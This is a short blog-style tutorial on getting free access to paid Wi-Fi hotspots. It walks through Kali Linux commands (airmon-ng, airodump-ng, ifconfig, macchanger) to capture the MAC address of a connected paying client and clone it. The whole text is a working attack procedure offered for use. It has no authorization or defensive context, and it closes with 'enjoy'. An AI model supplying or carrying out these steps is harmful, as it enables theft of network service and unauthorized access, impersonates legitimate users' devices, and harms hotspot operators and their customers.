How to Hack paid Hotspots
How to Hack paid Hotspots
Required :
- Kali linux
- USB Wifi card (Always better)
- Paid Hotspot target
1 - First, plug-in your wifi card (if you have one) and turn it to monitor mode :
airmon-ng start yourinterface
2 - Scan for Wifi around you :
airodump-ng yourmonitorinterface
3 - Then, find the hotspot in the list, copy it's bssid and it's channel, then open a new terminal and type in :
airodump-ng --bssid thebssidhere -c thechannelhere yourmonitorinterface
4 - Then it will clear and open a new window, analyzing the hotspot. The list should be divided in two, in the lower part are the information about the devices connected to the hotspot. Select the MAC address (under the "station" line) of one of these devices.
5 - Then we gonna spoof our MAC address in order to change it to the device's we just dumped the address, in order to be considered as a paid member for the hotspot. Just turn of your interface :
ifconfig yourinterface down
6 - Then type :
macchanger -m thedumpedmacadresshere yourinterface
7 - Then just turn on your interface :
ifconfig yourinterface up
8 - Connect to the hotspot and enjoy !
Comments
Post a Comment